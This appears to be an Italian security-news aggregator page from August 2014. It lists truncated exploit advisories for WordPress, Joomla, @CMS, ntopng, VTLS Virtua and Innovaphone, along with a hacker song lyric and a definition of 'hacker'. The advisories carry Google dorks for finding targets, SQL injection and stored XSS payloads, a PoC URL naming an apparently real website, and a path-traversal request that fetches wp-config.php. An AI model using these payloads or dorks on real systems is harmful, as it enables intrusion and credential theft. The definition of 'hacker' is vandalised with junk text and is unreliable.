WordPress WPtouch Mobile 3.4.5 Shell Upload

27 agosto 2014 - Fonte: http://www.mondounix.com
Wordpress WPtouch Mobile Plugin File Upload Vulnerability
 
=================================
 
 
====================
        ______               ___/  /  /                                /  /
       /  /  /___  ____  ___/__   /  /  ____  ____  _______  ____  ___/  /
   :  /  /  /    \/__  \/  /  /  /    \/    \/    \/  /    \/    \/     /
   | /  /  /  /  /     /  /  /  /  /  /  /  /  /__/  /  /__/  /  /  /  /
 --X-- /  /  /  /  /  /  /  /  /  /  /  /  /  /  /  /__   /   __/  /  /
   |\____/__/__/\____/\____/__/__/__/\____/__/  /__/  /  /\____/\____/
   :                   ____                        \____/:
                      /    \____  ____  ____  ____  ____ |
                     /  /  /    \/    \/    \/...

Leggi il seguito »

Joomla Spider 2.8.3 SQL Injection

27 agosto 2014 - Fonte: http://www.mondounix.com
######################
# Exploit Title : Joomla Spider video player 2.8.3 SQL Injection
 
# Exploit Author : Claudio Viviani
 
# Vendor Homepage : http://web-dorado.com/
 
# Software Link : http://extensions.joomla.org/extensions/multimedia/multimedia-players/video-players-a-gallery/22321
 
# Dork Google: inurl:/component/spidervideoplayer
               inurl:option=com_spidervideoplayer    
 
# Date : 2014-08-26
 
# Tested on : Windows 7 / Mozilla Firefox
#             Linux / Mozilla Firefox
 
 
 
######################
 
# PoC Exploit:
 
http://localhost/component/spidervideoplayer/?view=settings&format=row&typeselect=0&playlist=1,&theme=1'
 
"theme"...

Leggi il seguito »

Online Time Tracking Cross Site Scripting

26 agosto 2014 - Fonte: http://www.mondounix.com
# Affected software: Online Time Tacking - URL: https://paydirtapp.com/
# Discovered by: Provensec
# Website: http://www.provensec.com
# Type of vulnerability: XSS Stored
# Description: Paydirt is time tracking and invoicing software made for
browser-based freelancers and small businesses. It keeps track of who
you're working for so that you don't have to.
Paydirt is currently integrated with Chrome and Firefox, and will prompt
you to track time based on the websites you're using and the emails you
write.
# Proof of concept:
1 Goto https://paydirtapp.com/clients
2 Add a new client with any xss payload example ("><img src=d
onmouseover=prompt(1);>)
3 Now goto https://paydirtapp.com/clients again and XSS Works
4 Add...

Leggi il seguito »

CMS 2.1.1 SQL Injection

26 agosto 2014 - Fonte: http://www.mondounix.com
# SQL Injection on @CMS 2.1.1 Stable
# Risk: High
# CWE number: CWE-89
# Date: 22/08/2014
# Vendor: www.atcode.net
# Author: Felipe " Renzi " Gabriel
# Contact: renzi@linuxmail.org
# Tested on: Linux Mint
# Vulnerable File: articles.php
# Exploit:  http://host/articles.php?cat_id=[SQLI]
# PoC:      http://carla-columna.de/articles.php?cat_id=[SQLI]
 
 
--- "SQLi using sqlmap."---
 
Place: GET
Parameter: cat_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat_id=5' AND 6158=6158 AND 'SEMo'='SEMo
 
    Type: UNION query
    Title: MySQL UNION query (NULL) - 10 columns
    Payload: cat_id=5' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7163666971,0x6648715351716d446a54,0x71676e6371),NULL,NULL,NULL,NULL,NULL,NULL#
 
...

Leggi il seguito »

ntopng 1.2.0 Cross Site Scripting

26 agosto 2014 - Fonte: http://www.mondounix.com
ntopng 1.2.0 XSS injection using monitored network traffic
 
ntopng is the next generation version of the original ntop, a network 
traffic probe and monitor that shows the network usage, similar to what 
the popular top Unix command does.
 
The web-based frontend of the software is vulnerable to injection of 
script code via forged HTTP Host: request header lines in monitored 
network traffic.
 
HTTP Host request header lines are extracted using nDPI traffic 
classification library and used without sanitization in several places 
in the frontend, e.g. the Host overview and specific subpages for each 
monitored host.
 
The injected code might be used to execute javascript and to perform 
management actions with...

Leggi il seguito »

VTLS-Virtua SQL Injection

26 agosto 2014 - Fonte: http://www.mondounix.com
=====[Alligator Security Team - Security
Advisory]============================
 
     - VTLS Virtua InfoStation.cgi SQLi - CVE-2014-2081 -
 
  Author: José Tozo  < juniorbsd () gmail com >
 
=====[Table of
Contents]======================================================
 
1. Background
2. Detailed description
3. Other contexts & solutions
4. Timeline
5. References
 
=====[1.
Background]============================================================
 
* Versions affected: VTLS Virtua InfoStation.cgi - All Versions under 2014.X
                                                 - or 2013.2.X Are Affected
* Release date: 22/08/2014
* Impact: Allows unauthorized disclosure of information; Allows
unauthorized...

Leggi il seguito »

WordPress KenBurner Slider Arbitrary File Download

26 agosto 2014 - Fonte: http://www.mondounix.com
# Exploit Title : WordPress Plugin KenBurner Slider Arbitrary File Download Vulnerability
# Google Dork: Index of /wp-content/plugins/kbslider
# Date: 2014-08-21
# Exploit Author: MF0x and Daniel Pentest
# Vendor Homepage: http://codecanyon.net/item/responsive-kenburner-slider-jquery-plugin/1633038 
# Version: All
# Tested on: Windows 7 / Google Chrome
 
Description:
The Wordpress Plugin called KenBurner Slider suffers from Arbitrary File Download Vulnerability
 
Proof of Concept (PoC):
http://victim/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php
 
# Discovered by: MF0x and Daniel Pentest             
 
# Website: http://www.null-source.blogspot.com.br/
# Email: daniel@analistadesistema.net
#...

Leggi il seguito »

Ballata Hacker

24 agosto 2014 - Fonte: http://www.mondounix.com

Angelo Rindone - Ballata Hacker

Sogno un mondo open source
dov'è libero il sapere
come sangue nelle vene
porta ossigeno

ed è per questo che sto
dalla parte dei pirati
ed è per questo che ho
i pori della pelle dilatati

VOI CI CHIAMATE CRIMINALI
E NOI ESPLORIAMO
VOI CI CHIAMATE CRIMINALI
E NOI CERCHIAMO CONOSCENZA
VOI CI CHIAMATE CRIMINALI
MA NOI ESISTIAMO
SENZA COLORE DELLA PELLE
SENZA NAZIONALITA! *

Suono un sogno open source
perchè il brevetto è un'ossessione
di chi vuol esser padrone
tutta la vita padrone

ed è per questo che so
quello che ho fatto,
quello che ho
lo lascio libero nell'aria
libero nell'aria.....

http://www.inventati.org/hackeralbum/hacker.html

...

Leggi il seguito »

Hacker

24 agosto 2014 - Fonte: http://www.mondounix.com

hacker hacking hack

Un hacker (termine coniato negli Stati Uniti d'America) è una persona che gioca a minecraft e fare la cacca in una maniera assurda e affrontare sfide intellettuali per aggirare o superare creativamente le limitazioni che le vengono imposte, non limitatddfsadffai suoi ambiti d'interesse (che di solito comprendono l'informatica o l'ingegneria elettronica), ma in tutti gli aspetti della vita.

Esiste un luogo comune, usato soprattutto dai mass media (a partire dagli anni ottanta), per cui il termine hacker viene associato ai criminali informatici, la cui definizione corretta è, invece, cracker.

Origine del termine

Il New Hacker Dictionary, compendio online dove sono raccolti i termini...

Leggi il seguito »

Innovaphone PBX Cross Site Request Forgery

24 agosto 2014 - Fonte: http://www.mondounix.com
Title: Innovaphone PBX Admin-GUI CSRF
Impact: High
CVSS2 Score: 7.8 (AV:N/AC:M/Au:S/C:P/I:C/A:C/E:F/RL:U/RC:C)
Announced: August 21, 2014
Reporter: Rainer Giedat (NSIDE ATTACK LOGIC GmbH, www.nsideattacklogic.de)
Products: Innovaphone PBX Administration GUI
Affected Versions: all known versions (tested 10.00 sr11)
CVE-id: CVE-2014-5335
 
Summary
=======
 
The innovaphone PBX is a powerful and sophisticated VoIP telephone system for use in professional business environments. In addition to a wide range of IP telephony functionalities, the innovaphone PBX is also equipped with a perfectly integrated Unified Communications solution that can be enabled as needed at any time and at any workspace.
 
The innovaphone PBX uses...

Leggi il seguito »